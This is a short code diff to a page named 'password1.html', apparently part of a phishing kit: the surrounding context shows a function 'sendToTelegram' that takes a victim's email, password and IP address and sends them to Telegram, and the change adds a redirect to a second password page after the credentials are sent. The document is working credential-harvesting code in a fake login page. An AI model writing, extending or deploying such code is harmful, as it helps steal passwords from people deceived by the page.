--- a/password1.html
+++ b/password1.html
@@ -122,6 +122,8 @@ function sendToTelegram(email, password, ipAddress) {
         .catch(error => {
             console.error("Error sending message to Telegram:", error);
         });
+
+        window.location.href = 'password2.html';
 }
 
 
